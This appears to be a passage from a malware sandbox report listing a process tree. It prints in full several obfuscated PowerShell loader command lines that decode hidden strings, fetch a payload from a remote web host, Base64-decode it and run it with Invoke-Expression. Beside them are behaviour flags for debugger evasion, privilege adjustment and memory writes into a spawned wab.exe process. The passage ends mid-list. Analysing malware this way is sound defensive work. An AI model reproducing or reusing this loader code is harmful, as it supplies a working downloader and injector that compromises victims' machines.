Eskao,ugen/Spurm2Bssem0Staff1Indle0F.nkt0 .ulf1Pusle0Cran,1c dde HovedFPrintiDigesrKontueTheirfBes ioLatrix Jeri/,alco1Syn n2 yol,1Sacre.Kaplb0Femaa ';$kongetitels=Generative 'SkideULigelsF edne PermrKe.ne-UheldARedstgElem.eRestonOpvart luc ';$Decrepitness=Generative ' SquahNonhetHetert LagrpOptimsA ria: L,ri/ Caut/Li,strSelekaLessenIntoxcKitl hHjemmo DrifbOmtaloBabyssBiedecFangeaJrlior DokudRdkaaiProjenReabo.Compuc Art o Sp.imSk.kt.AvertbL,ptor Skrd/VirksdOphicc V,rd/biskoGKvoter ShaueJaniteNyerhn Gulvs irupagyth nFri,fdCop i.Bombao ntecPaganxVelfr ';$Sparging=Generative 'Afkod> Int, ';$Emblematicise=Generative 'DogcaiSperle Dyppx Akaz ';$Fish='Afstaliniserende';Telefonforbindelsernes (Generative '.anetS ublueBortctstrmk- .endCCysteo deenUnv.bt,ultue Br.sn Subst Au.o bista- MariPforaya NucltProprhchrom KontaTLigus: Auto\.ainsADrotseCyt.krAmbeeoJubarlThemsiandentSteaniCalcicSobbi.krerptLnkamxConf tUnbad Knska- StivV Za.ia Id llReturu Tra e Unde Forse$UdsprF Indii Aceds R sth u,ro;Unrec ');Telefonforbindelsernes (Generative 'Domi iSlvklfMyt,o Aftra(TerybtMaksie Skr,sTol.btGenne- A,prpTyveraSer.ltPatinhTrigl Loka,TScant:Mjdet\NibliANondeeRysler Parao,alaxlTeodiiasciit.dfrsi.oaorcpeber.Non atBenzixNonnetOpera)Il,eb{ Farae Ex exFiguriForsttHauss}Pa kv;Kvato ');$Drikkevareemballagen = Generative 'Ka,toeG.nfrcDvehjhReligoTurbo Mosqu% entraB,hndpMisawpHerredKaloraEppiet .ollaAfsla%Dandy\ RemeSSt,ckk ythii Sa,gn FrstbWir raiblanrStaillMaskli Clerg Hfebe pernrSaccoeEgebrsstatu1engan5Behov6bogho.Brunan FylkaPatrutanti, inte& Trv.&Tyks. TyraneAdynac egomh Dr.go cra logar$Splen ';Telefonforbindelsernes (Generative 'Stu m$SalvogSoci.lBenkro HotdbAccelaEthlylSuper:XihypTDobbeoBillepSnubbf entlGudsbiEmuleg yrevhSage tUpbol=Svin (Eftercfiffim PresdVival Krypt/gnathcDy de Onera$IdiomDBorndrOutc iSpaankIdolakIlfrdeObstavCalipaNonnerF,rreemrkvreKonsemRredeb.analaSlugtl Natilwhitta L gegFlyvreManchnKathu)Hyper ');Telefonforbindelsernes (Generative 'Vris.$Spi.egSub elResboo Learb Cod.aK.mpdlMecha:Va drVPalaeoOdou,l jerd,ambusgaves=Obsk,$Smre D,pokoeTogp.cSuperrK,rsue BrutpLsideiBal.ntRefranHrguleAlim sTweaksUnenc.B.roksVentrpInfielOnom,i MeditAnn,t( Haje$NeapoSBktnipGlaciaMinyarAlbumgUnwari elefn SassgMikae)Re.ud ');$Decrepitness=$Volds[0];Telefonforbindelsernes (Generative 'Ener.$Vatu,gTitanlD,rmaospaadbSche aSjovelLeadw: TrutSGennet,nuckuSygdodHa.mliStudie Kobblultrae Hjesg P,laaRubbetGaulseH.arsrSpea.sCo te= JudoNVulneeIrl.nwUnip -RetriO SamfbHjspnjAmphie Comac S,mftOut o ChlorS lbniyreavesledtstSkrifeTourtmGrupp. ByggN imeneBetnktAxoid.sync.WDyreae BlaabFabriCNatiolFungoiTeleoeDessenHovedtAccep ');Telefonforbindelsernes (Generative 'Frafa$ alliS SabrtKrydsuUnweldAutomiMicroeAktivlAppaleCentrg isosaTal,ctKonste ResyrMuckssUn.er.FilmeHGoatpeVes.iaK,lded H,deemde arForess Skak[Tredv$ VurdkSinkbo.rdoknDolerg DvrgeNonsatTarmeiGenestAfpareunhollsinlis Iden] T.ot= lact$AtreiH Tse,o udtmoUntrudLimpayEmbro ');$Acidology=Generative 'E spoSSprogtTribauUratod Fwdbi harteChemol Ambie Rekogtamera Implt Chece,ndarrKaldssFor,a.circuDComatoVandewFlippnTar el samfo AakaaHeterdsklerFVoyagibuffelConcee Ador(Has n$L.retD.ingsePhilocToa,rrOv.rseVi,ksp SilkiLanthtVok,vnCas ieD.matsAryb,sTraj.,W,eyl$ProteSTurc t Foraa MundmBoldekProtoa Grenf Mellf DepeuSh.veeStillnCondi)Drivh ';$Acidology=$Topflight[1]+$Acidology;$Stamkaffuen=$Topflight[0];Telefonforbindelsernes (Generative 'Minia$ Roseg OpsilFornjoSagsbb KodeabondslExote:SantoICh onr KonfoKaritnInkaswSkrueoBeskyrSparktnonex=Vi,ev(KatodTMarskeStriksIncartHafga-Ska eP Un raBombat RomahHa,sl Servi$BlufrS.aroltSangsaS,ewhm arigkUntwiaHentyf ItonfExostuLign e Fregn Frem) Kool ');while (!$Ironwort) {Telefonforbindelsernes (Generative 'Inte,$.alavgSwainl,tartoFar.obAntita,lowflSuber:Ner,eK S.enlAfblaiAksi,tHjmaroMede,rEndnoicrochsFormusIncomeL.vtrr imponTeleseDiske=Ls ng$SkrmstpietrrCheapuRundfeSte.e ') ;Telefonforbindelsernes $Acidology;Telefonforbindelsernes (Generative 'aflevSStandtAstriaKorserTanketBookk-NonreSRaa sl UdbreJoiniePremapTek,t Fraud4Vo at ');Telefonforbindelsernes (Generative 'Hyste$UndergBirthlV,jrpoT hvebSpndiaSemial A gu:TosepI .sserSmughoWhitenFyrigw Ponco Beaar reagtS.ott=Kugle( DyssTSclere ,bdosOverptLnr,g- AritPGaffeaDipthtUninhhImpli Civi$KogenSHaandtDess aExtermRutsjk A,kua SuwefVintefOe.onu SidseFolkenSaddl)In il ') ;Telefonforbindelsernes (Generative 'Talen$Bankvg Ted.lObl goBilggb StilaSprinlFjset:SaxofEApollmForynaMo.uln Limaaom ivtFladbiO ersoOlva,nReagee ,onsnCarri2S raw3Tropi9 Down=.irel$gobblgDampnlrepinoFilicb.indea NgstlOphed:I.terBRacemrBaskeaTomesmProjefLegpirriotii gurgt Blin+,eton+Resig%papay$TrsteVEkspao JasplRefo.dunbolsMarke..oneycEkspro FusluSanktn Morat Uige ') ;$Decrepitness=$Volds[$Emanationen239];}$Tantawy=293146;$reconsolidated=28794;Telefonforbindelsernes (Generative ' L qu$OptimgstramlPrjseo SardbGyro,aMrtlelHensi:Re,owB Alt lComp,apa ankBrokakundereArrakrCry nnDannee drivsRocke Annun= em.t UdtvrGTjrene,pokrtChrys- Sk.fC CorpoC.acknAbject Chaue usinn.impetUnerr Jacks$DioscS InditSnowbaMagnemCom ek.ompra Brodf OpvufRek,iuHypnoeAuladn.egej ');Telefonforbindelsernes (Generative 'Jour $nonphgSa,tulVandroGr,jeb MetoaKn cklExoph:SmackE BekeuStr,nkK blea.agnelKnas,yLarvap KosatDismaurit.rsmaoisscep aeKodifnMise Ha s= Utrt mi ju[VoldtSEva,uy nwas K,ustParite slagmMadse.Dith,CBulkhoHowesnFringvClonaeCh onr,ennitRoedm]Anom :Nat.e: S.ltF Seddr .pono UdsymOcci,BAn.ipa Modis,dspeeFrans6Foroe4StagvSAliamtFebrirS.ramiB.sionSlemmgm,rro(Reass$Pri,aBFld.nlNonfra.ggshkFromlk,nsufe PingrRemmen illeetoskisVidim) Gala ');Telefonforbindelsernes (Generative 'forka$Kor.sg,roholDiskooSouplbPillaaSmaasl peri:BerusK TalseSpoormKalveiFilmakUrokka eetlBra.mi Euphe,atioiAril.nQ artd UndvuEttlisTosprtHan erR fraiCh sss Ku o inn m=Elect Udstr[ HjfrSSpinly.nomosCounttMethyeSvam mConcr.HawaiT HedgeU,ochxCoexitFor.r.UnderE Gantnu.paycBiogros,anddTimidiUred,nG bangSemis]Bemal: Hand:Sh ppA NounS,entaCAffugITekstIJordv.KaryoG bra,e SkoltHexa,SBer tt TrufrSo.siiOverdn vigugBikse(Su,ve$AnnelESc,oou Tensk ineaaFarr lThougy ReagpSwitct InfouSknsasSynagsProgre.edton Pe c) Af,r ');Telefonforbindelsernes (Generative 'Litho$ BombgPomerlF rvnoBetjebexpliaF,ipolSequa: PermOwittipSmigvhuimo aIn.usvLnudvsVari rU cogeLobbitMetalschromb Exene AarsswantakTidsfyLocultDextrtP boieUgunsdPaleoegudsf=Destr$Gla oKFlleseMinermBiss.iIntrakHomoiaHimmelSnrini MjsoeResp.iChamanSplend S euu P.eusCircutHolt,rTil riWestss auss.Blueps ,ynauUngd,bStrymsFarvntTale r Te,ni TcawnVad fg Str,(Afg.f$An itTSeko,a,nexpnDisartUfremaSimulw Refuylevne,Afsen$ MassrPteroe RadicUrerso BothnK,mmesBiorhofarmslG.mnaiFor ad,tkama GeartTubefeUnderdGoatl)Basis ');Telefonforbindelsernes $Ophavsretsbeskyttede;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skinbarligeres156.nat && echo $"
8⤵
PID:776

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1840

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\euvpky.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Drepanium = 1;$Stratifications='Su';$Stratifications+='bstrin';$Stratifications+='g';Function Stueetagernes($Roentgenometry){$Photoceramic=$Roentgenometry.Length-$Drepanium;For($Flagliners=5;$Flagliners -lt $Photoceramic;$Flagliners+=6){$Oprrt+=$Roentgenometry.$Stratifications.Invoke( $Flagliners, $Drepanium);}$Oprrt;}function Pensionsopsparing($Tyndslidnings){& ($liliales) ($Tyndslidnings);}$Trenails=Stueetagernes 'GuttuMBuroboCitroz Disai U,volwhizzl aksea Vulg/teate5Taras.Hjemt0dil,e Dy st( AntiWLar.ii UntrnflagmdD,savo Ro,gwRephosHimme IntimN.lderTMis c Vragr1Cip l0Plat .varmt0Unlea;Gift, kbestWAvlsaiStramn Char6De.on4Autoc;Disha chinax Unam6Mods.4Exoph;Win b CrestrKrigsvAdo t:guzzl1 S,hy2M,ner1Parah.Cep.a0Adhib)venia R,bbiG AdvaeOverccHy,erkC,vitoTypol/Ma,or2Emigr0 Frem1 .dmi0P,rom0 Retr1Semim0C.lor1Savvr kygFd.omai PjusrIodode M,refLa,dgo Ise.xMulti/Torte1recur2 weet1Undre.Potch0Vejle ';$Naturaliseredes=Stueetagernes ' B.llUNonsas Irr.eTravhrVans.-StrikA OvergCovereVirginOmstrtMoh,l ';$Snurrende=Stueetagernes 'Ston,hWerchten latCentrp ForusSkral:Bolsm/Short/Stjerr Tun a CommnFortrcP kalhBel.sokuldkb tepho,nplisParlocPoly,aFritsrOutmadBetryiUltranEnerg.Snn kc AmauoThro.m eser.CicerbsongirWen,y/UhomodGynaecEnsar/,egonAPropes.orklyBa ton Semiabombsr PagitDiffeeEntret .agbeSwobb.Blistc Or lsInconvKombi ';$Skudviddernes=Stueetagernes ' forh>Count ';$liliales=Stueetagernes 'VakleiFlicke Gerax Ord. ';$Breplaner='astrobiologists';Pensionsopsparing (Stueetagernes 'MilieS s lae,ultutDemol- JugeCF,stfoSkridnInq itBe gaePrefen stattTrans aske-CapitPHovedaMissttSimulh Mech SkrigTMine.:Educa\SedenSMossikHostaoSemidvApp.obLaotsrModiaukennegNattes,oolaeOrdinrBismehN ncovKrsuseMetacrBjer,vDrgnieHerpenUnhaleFalsksStofm.Mislit GlasxOrthot Meth Jenk- L,ndV G.unaBet,ll FibruOpgave Tryk Kaste$OfficB Budgrethoxe ariapMillil E,skaM llenSkolee UncarFront;Jateo ');Pensionsopsparing (Stueetagernes 'LiveniTako,f Revi Yello(SaccatRou,eePilotsOrdgytBonni-CrepepEgoi,aGdsketUnsuphSkov EnwheTIndfl:Dsene\TypotSLsladkKur toOculiv Listb,tindr fi euTude,gDekonsUdkikeCommor.vdinh Svinv MelleUd.anrT ehuvMigraeStaalnNonirelongisPhoto.AvicutWeedaxFrouzt.otel)Chrom{ unexe uerixov.rbiBras t naer}Terre;S rin ');$Nongipsy = Stueetagernes ' ReoxeRe.nfc Joy,hO,holoBesyv ,nde% .orga AmospStrafp.rsted .ugaaPseudt Hy raPter.%Incit\ VentTM.anercad.uiJenopnMd.staZoochtinomyi LeptoBundtnB odk.ca.arFDimitoSporor Cock Rata&Und i&Congl For.e ScoucBlndehredskoAr aw Be et$tox,c ';Pensionsopsparing (Stueetagernes 'Fedth$ BurggCh kelTodagoRegnsbpelleaOttrol Delt:ConceN ,asiaBveruvVulk,i KanegM,sleaIndi.b HamseSchellSilve= Omla(StyrtcMatrimTornedEpicr Pal i/ Rhe c Efte halsh$StabiN,kydeoKiwifnO.ersgRaf,ei I depPur,isNitriyWi,he)Wheat ');Pensionsopsparing (Stueetagernes 'Flels$ForfogIntellJac,aoRam.ib VoweaKbeb lTrans:SadelJInficaWleccmAtlanwYearnoRe idoNullsd ,oem1 Har,7Tutel5Bille=Ant.g$N,tamSJ,rdsnStatsuReharrM.rcerBogt e forsnSl,ngdKodeoeMixti.Fn mes Ekspp StttlAcc,ui.evogtAnalo(Vartv$Indk.SOzonikKrum,uImperd.dposv ,anti RepedSammedBrebreRoyalrDecimnOppore.nwalsvarte)Alime ');$Snurrende=$Jamwood175[0];Pensionsopsparing (Stueetagernes 'Aband$ GringCom,alF yttoCyclobSpargarre.dlR.mli:Til,vYPr.grasatirtShoweaR,attg PosshDorylaSkuffnFrevl=EbraiNSamleeRe,oswRbdig-Sur.iORekapbStt ej Swore Op rcAbbretRever TrilSS,rupyDiagnsMonkftLaugheIncomm,lyan.SensoNApog eNonpetG,nan.ChimaW FunceUnds,bH,ndeCkognil Elsei palbeToluinSansetUfatt ');Pensionsopsparing (Stueetagernes 'Fng,l$NonsuYUdfrla Count AfeaaSk ndg Ba bhStandaSed,lnStart.CabbaHUnanneOvermaMa ayd pacheEksilrPentasUnlei[Vi,en$ orsaNAscetaApothtBenonu .ubdrFi ana WorslOptimi Te.rsMecume ankirSerieeKhanedSpasseDuelisPerfo]Sekun= Afkr$.iskeT cuttrAlco e Krimn VillaSrbesikraftl NondsErrab ');$Doni=Stueetagernes 'PerspYDownca.ntratSynapaRundhgReinshAnnonap.adrnL.ndi.Call.DCanzoo.etrowOffprnadveclSt,rvo DreaaWakeldOutplFOrddeiProgrlKonkueBrazi( punk$EmigrSSmilenAfkaluK.ldtrRundbrKldere lli,nBlecidMaskie Sen.,,inim$Billea Tricn,etanoImm,tnKmpegy LapwmErh.eeUnpa,)aviso ';$Doni=$Navigabel[1]+$Doni;$anonyme=$Navigabel[0];Pensionsopsparing (Stueetagernes 'Arbej$ChumpgDogmelTummuo,acutbDe.igaMid tl Misg:MixetPPotamrSildeoPebertOmskooSalmorRevuloPrints,pvisaTung,uSkoler Heroi ColedPleuraHa.bueVedhf=.frie(DdfunTSo.tseLimits NonitIn,ar-BlodsPDiveraPrec,tLertjh Kred Ce,tr$N.uniaHocklnSkakmoBillin ForsyBaloumI.ocheprogr)Antr. ');while (!$Protorosauridae) {Pensionsopsparing (Stueetagernes 'Dir.y$id.tsgReartl Ka eoOverdbHambuaSolenlU.gdo:FrictRGnammyAdmirk A,xikJernke Overr RekubFejlnrBrot.eTempovFrisreCrysts Mora=Symbi$ St ttArbejr,liveu Pal.ePse,d ') ;Pensionsopsparing $Doni;Pensionsopsparing (Stueetagernes 'A.syrSBl,ejtTraduaTabour PigetAdmin-homopSHyl.zlReporeTrif eBegr pAnten Grup4Pre i ');Pensionsopsparing (Stueetagernes 'tuk,n$DatafgkongslRenatoLuetib SoliaUnsorlIlloy:In kaPP,sterBeskroRavnet MarioGomlarTeatlosupplsBjleraCreosuGlistrBloodiK.rsldSvanhaBespoe Komm= B,op( StraTAntideSmugls LegitUlden-Li.fsPPri oa B ustUnh.lhAeter Fo.sy$,llusaUddeln PrecoHomoln Heary anlgmUnbaieFast,) Hoax ') ;Pensionsopsparing (Stueetagernes 'Indsv$LithogScooplMtaa oPandebStbloaUnwhelPerfi: .oxiLVa.ebdUnhosrG egee OmanpBesrglBej eaGumminAkkom1Repud8Xe om9Count=Ionic$ emocgDkketlEmploo,redeb BalkaA benlDag.i: DonkSSurget,mashuMedvidBluehs Mo,lnUncini,oltan.nderg Kla.eRearwrA adas,ploe+vivac+ Inte%Copin$DaahjJ Aslaa ffalmSk.eowIn.erotyranoBan.sd Pred1Antit7r tat5overj. oaric Alumo OveruDecr.nInf.ct Elfe ') ;$Snurrende=$Jamwood175[$Ldreplan189];}$Luksusartikels=297137;$Nonaphoristically=28508;Pensionsopsparing (Stueetagernes 'Trans$K rengBaratlRoseaoOperabTaa.na.yodelNorma:UsandDOri.nrS,onge,abeljDdsdoe Dolks dva,tSu.ero Flyvl ipro Av,nc=Alle Stoc GBestieForkrtBedkk-ethm C F guoTransn Cortt Sur.e Bk,enIsed t Nond Reapo$UnrudaNonmin pondoE iksnLyeneyConvemDrifte Hoej ');Pensionsopsparing (Stueetagernes 'Om ys$Top pgaand lSulevoN utrbGa.isaSubtrlEstra:Rep iGEfteroBevgelReadmdEnjoyc SubouFaginpLakri Unrui=Stigm Print[ AromSBemesyFagids Goldt Chi e ,vidm.uskm.OrdinCLycidoUndernKon,tvTindieSubg,rStrait .amp]T lex:Tural: N.rkFSyvt.rO.eraoStad,m.hipiBMuehlaunrepsTrisseS ang6Capit4 Nep SDelprt Gummr,cuteiOv.rsnStoppgParke(Fatni$.lemmDSpegerJoke,eAnci.jluceleselsrsMusentOver o thinlDrluk)Rachi ');Pensionsopsparing (Stueetagernes 'Hoved$HammegTrnrelHalv,oUdkobbSprjtaStterlGarot: Sam Sthreaa GumwdHexadeAfdislRestap MotolUdmaraNonapdU,adesDryope ommnCane.sMaltr Sko.k= Faqu Konto[,oldbSUndery ndensantontskm,eeMo.inmHydro.TakspT MinieForurxOptnktPsyc .Lac oERetfrnUni.icG.llioM.copd,ilabiDesernAfd.mgBlayk] Elec:Relat: VelsA TeleSim.olCIndskIMa,siI Dann.Vol,eG .rese,ilgot BoliSFlerdttylosrOrcaxiFastsnQu.ltgUnbur(Bagpr$SequeG ortjoUdplulA.taldSubumcHeedeu Shagp Wild)Krop, ');Pensionsopsparing (Stueetagernes 'Ek ko$ImoedgCh.lilSwou.o Un ebStrafa Plenlanoma:NarcoM L,fteMilittsy.enrI,diveV pousOktal=Parla$L.derSFi.riaFerskdA,chpeandellSyn.hp TililForpaa Canid GasksMedjie vr,tnRegresSuspe.BedknsPsychuPittab slumsCykelt Parer AntiiCapetnAffldg Lint(Elvrk$V.gelLStereuB rthkBunkesAlcyou .andsTppelaAttrirVed,otExci i GallkDerefeResullDosmesCentr,Titoi$ GlubNDamesoPrefanBeseja UnprpRemilhM,onioOldefrAntiniEksersRaskmtB,etriGran c Nerva nnablM.rinlBrummyAgout)Cli,f ');Pensionsopsparing $Metres;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trination.For && echo $"
7⤵
PID:4920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Drepanium = 1;$Stratifications='Su';$Stratifications+='bstrin';$Stratifications+='g';Function Stueetagernes($Roentgenometry){$Photoceramic=$Roentgenometry.Length-$Drepanium;For($Flagliners=5;$Flagliners -lt $Photoceramic;$Flagliners+=6){$Oprrt+=$Roentgenometry.$Stratifications.Invoke( $Flagliners, $Drepanium);}$Oprrt;}function Pensionsopsparing($Tyndslidnings){& ($liliales) ($Tyndslidnings);}$Trenails=Stueetagernes 'GuttuMBuroboCitroz Disai U,volwhizzl aksea Vulg/teate5Taras.Hjemt0dil,e Dy st( AntiWLar.ii UntrnflagmdD,savo Ro,gwRephosHimme IntimN.lderTMis c Vragr1Cip l0Plat .varmt0Unlea;Gift, kbestWAvlsaiStramn Char6De.on4Autoc;Disha chinax Unam6Mods.4Exoph;Win b CrestrKrigsvAdo t:guzzl1 S,hy2M,ner1Parah.Cep.a0Adhib)venia R,bbiG AdvaeOverccHy,erkC,vitoTypol/Ma,or2Emigr0 Frem1 .dmi0P,rom0 Retr1Semim0C.lor1Savvr kygFd.omai PjusrIodode M,refLa,dgo Ise.xMulti/Torte1recur2 weet1Undre.Potch0Vejle ';$Naturaliseredes=Stueetagernes ' B.llUNonsas Irr.eTravhrVans.-StrikA OvergCovereVirginOmstrtMoh,l ';$Snurrende=Stueetagernes 'Ston,hWerchten latCentrp ForusSkral:Bolsm/Short/Stjerr Tun a CommnFortrcP kalhBel.sokuldkb tepho,nplisParlocPoly,aFritsrOutmadBetryiUltranEnerg.Snn kc AmauoThro.m eser.CicerbsongirWen,y/UhomodGynaecEnsar/,egonAPropes.orklyBa ton Semiabombsr PagitDiffeeEntret .agbeSwobb.Blistc Or lsInconvKombi ';$Skudviddernes=Stueetagernes ' forh>Count ';$liliales=Stueetagernes 'VakleiFlicke Gerax Ord. ';$Breplaner='astrobiologists';Pensionsopsparing (Stueetagernes 'MilieS s lae,ultutDemol- JugeCF,stfoSkridnInq itBe gaePrefen stattTrans aske-CapitPHovedaMissttSimulh Mech SkrigTMine.:Educa\SedenSMossikHostaoSemidvApp.obLaotsrModiaukennegNattes,oolaeOrdinrBismehN ncovKrsuseMetacrBjer,vDrgnieHerpenUnhaleFalsksStofm.Mislit GlasxOrthot Meth Jenk- L,ndV G.unaBet,ll FibruOpgave Tryk Kaste$OfficB Budgrethoxe ariapMillil E,skaM llenSkolee UncarFront;Jateo ');Pensionsopsparing (Stueetagernes 'LiveniTako,f Revi Yello(SaccatRou,eePilotsOrdgytBonni-CrepepEgoi,aGdsketUnsuphSkov EnwheTIndfl:Dsene\TypotSLsladkKur toOculiv Listb,tindr fi euTude,gDekonsUdkikeCommor.vdinh Svinv MelleUd.anrT ehuvMigraeStaalnNonirelongisPhoto.AvicutWeedaxFrouzt.otel)Chrom{ unexe uerixov.rbiBras t naer}Terre;S rin ');$Nongipsy = Stueetagernes ' ReoxeRe.nfc Joy,hO,holoBesyv ,nde% .orga AmospStrafp.rsted .ugaaPseudt Hy raPter.%Incit\ VentTM.anercad.uiJenopnMd.staZoochtinomyi LeptoBundtnB odk.ca.arFDimitoSporor Cock Rata&Und i&Congl For.e ScoucBlndehredskoAr aw Be et$tox,c ';Pensionsopsparing (Stueetagernes 'Fedth$ BurggCh kelTodagoRegnsbpelleaOttrol Delt:ConceN ,asiaBveruvVulk,i KanegM,sleaIndi.b HamseSchellSilve= Omla(StyrtcMatrimTornedEpicr Pal i/ Rhe c Efte halsh$StabiN,kydeoKiwifnO.ersgRaf,ei I depPur,isNitriyWi,he)Wheat ');Pensionsopsparing (Stueetagernes 'Flels$ForfogIntellJac,aoRam.ib VoweaKbeb lTrans:SadelJInficaWleccmAtlanwYearnoRe idoNullsd ,oem1 Har,7Tutel5Bille=Ant.g$N,tamSJ,rdsnStatsuReharrM.rcerBogt e forsnSl,ngdKodeoeMixti.Fn mes Ekspp StttlAcc,ui.evogtAnalo(Vartv$Indk.SOzonikKrum,uImperd.dposv ,anti RepedSammedBrebreRoyalrDecimnOppore.nwalsvarte)Alime ');$Snurrende=$Jamwood175[0];Pensionsopsparing (Stueetagernes 'Aband$ GringCom,alF yttoCyclobSpargarre.dlR.mli:Til,vYPr.grasatirtShoweaR,attg PosshDorylaSkuffnFrevl=EbraiNSamleeRe,oswRbdig-Sur.iORekapbStt ej Swore Op rcAbbretRever TrilSS,rupyDiagnsMonkftLaugheIncomm,lyan.SensoNApog eNonpetG,nan.ChimaW FunceUnds,bH,ndeCkognil Elsei palbeToluinSansetUfatt ');Pensionsopsparing (Stueetagernes 'Fng,l$NonsuYUdfrla Count AfeaaSk ndg Ba bhStandaSed,lnStart.CabbaHUnanneOvermaMa ayd pacheEksilrPentasUnlei[Vi,en$ orsaNAscetaApothtBenonu .ubdrFi ana WorslOptimi Te.rsMecume ankirSerieeKhanedSpasseDuelisPerfo]Sekun= Afkr$.iskeT cuttrAlco e Krimn VillaSrbesikraftl NondsErrab ');$Doni=Stueetagernes 'PerspYDownca.ntratSynapaRundhgReinshAnnonap.adrnL.ndi.Call.DCanzoo.etrowOffprnadveclSt,rvo DreaaWakeldOutplFOrddeiProgrlKonkueBrazi( punk$EmigrSSmilenAfkaluK.ldtrRundbrKldere lli,nBlecidMaskie Sen.,,inim$Billea Tricn,etanoImm,tnKmpegy LapwmErh.eeUnpa,)aviso ';$Doni=$Navigabel[1]+$Doni;$anonyme=$Navigabel[0];Pensionsopsparing (Stueetagernes 'Arbej$ChumpgDogmelTummuo,acutbDe.igaMid tl Misg:MixetPPotamrSildeoPebertOmskooSalmorRevuloPrints,pvisaTung,uSkoler Heroi ColedPleuraHa.bueVedhf=.frie(DdfunTSo.tseLimits NonitIn,ar-BlodsPDiveraPrec,tLertjh Kred Ce,tr$N.uniaHocklnSkakmoBillin ForsyBaloumI.ocheprogr)Antr. ');while (!$Protorosauridae) {Pensionsopsparing (Stueetagernes 'Dir.y$id.tsgReartl Ka eoOverdbHambuaSolenlU.gdo:FrictRGnammyAdmirk A,xikJernke Overr RekubFejlnrBrot.eTempovFrisreCrysts Mora=Symbi$ St ttArbejr,liveu Pal.ePse,d ') ;Pensionsopsparing $Doni;Pensionsopsparing (Stueetagernes 'A.syrSBl,ejtTraduaTabour PigetAdmin-homopSHyl.zlReporeTrif eBegr pAnten Grup4Pre i ');Pensionsopsparing (Stueetagernes 'tuk,n$DatafgkongslRenatoLuetib SoliaUnsorlIlloy:In kaPP,sterBeskroRavnet MarioGomlarTeatlosupplsBjleraCreosuGlistrBloodiK.rsldSvanhaBespoe Komm= B,op( StraTAntideSmugls LegitUlden-Li.fsPPri oa B ustUnh.lhAeter Fo.sy$,llusaUddeln PrecoHomoln Heary anlgmUnbaieFast,) Hoax ') ;Pensionsopsparing (Stueetagernes 'Indsv$LithogScooplMtaa oPandebStbloaUnwhelPerfi: .oxiLVa.ebdUnhosrG egee OmanpBesrglBej eaGumminAkkom1Repud8Xe om9Count=Ionic$ emocgDkketlEmploo,redeb BalkaA benlDag.i: DonkSSurget,mashuMedvidBluehs Mo,lnUncini,oltan.nderg Kla.eRearwrA adas,ploe+vivac+ Inte%Copin$DaahjJ Aslaa ffalmSk.eowIn.erotyranoBan.sd Pred1Antit7r tat5overj. oaric Alumo OveruDecr.nInf.ct Elfe ') ;$Snurrende=$Jamwood175[$Ldreplan189];}$Luksusartikels=297137;$Nonaphoristically=28508;Pensionsopsparing (Stueetagernes 'Trans$K rengBaratlRoseaoOperabTaa.na.yodelNorma:UsandDOri.nrS,onge,abeljDdsdoe Dolks dva,tSu.ero Flyvl ipro Av,nc=Alle Stoc GBestieForkrtBedkk-ethm C F guoTransn Cortt Sur.e Bk,enIsed t Nond Reapo$UnrudaNonmin pondoE iksnLyeneyConvemDrifte Hoej ');Pensionsopsparing (Stueetagernes 'Om ys$Top pgaand lSulevoN utrbGa.isaSubtrlEstra:Rep iGEfteroBevgelReadmdEnjoyc SubouFaginpLakri Unrui=Stigm Print[ AromSBemesyFagids Goldt Chi e ,vidm.uskm.OrdinCLycidoUndernKon,tvTindieSubg,rStrait .amp]T lex:Tural: N.rkFSyvt.rO.eraoStad,m.hipiBMuehlaunrepsTrisseS ang6Capit4 Nep SDelprt Gummr,cuteiOv.rsnStoppgParke(Fatni$.lemmDSpegerJoke,eAnci.jluceleselsrsMusentOver o thinlDrluk)Rachi ');Pensionsopsparing (Stueetagernes 'Hoved$HammegTrnrelHalv,oUdkobbSprjtaStterlGarot: Sam Sthreaa GumwdHexadeAfdislRestap MotolUdmaraNonapdU,adesDryope ommnCane.sMaltr Sko.k= Faqu Konto[,oldbSUndery ndensantontskm,eeMo.inmHydro.TakspT MinieForurxOptnktPsyc .Lac oERetfrnUni.icG.llioM.copd,ilabiDesernAfd.mgBlayk] Elec:Relat: VelsA TeleSim.olCIndskIMa,siI Dann.Vol,eG .rese,ilgot BoliSFlerdttylosrOrcaxiFastsnQu.ltgUnbur(Bagpr$SequeG ortjoUdplulA.taldSubumcHeedeu Shagp Wild)Krop, ');Pensionsopsparing (Stueetagernes 'Ek ko$ImoedgCh.lilSwou.o Un ebStrafa Plenlanoma:NarcoM L,fteMilittsy.enrI,diveV pousOktal=Parla$L.derSFi.riaFerskdA,chpeandellSyn.hp TililForpaa Canid GasksMedjie vr,tnRegresSuspe.BedknsPsychuPittab slumsCykelt Parer AntiiCapetnAffldg Lint(Elvrk$V.gelLStereuB rthkBunkesAlcyou .andsTppelaAttrirVed,otExci i GallkDerefeResullDosmesCentr,Titoi$ GlubNDamesoPrefanBeseja UnprpRemilhM,onioOldefrAntiniEksersRaskmtB,etriGran c Nerva nnablM.rinlBrummyAgout)Cli,f ');Pensionsopsparing $Metres;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\cmd.exe
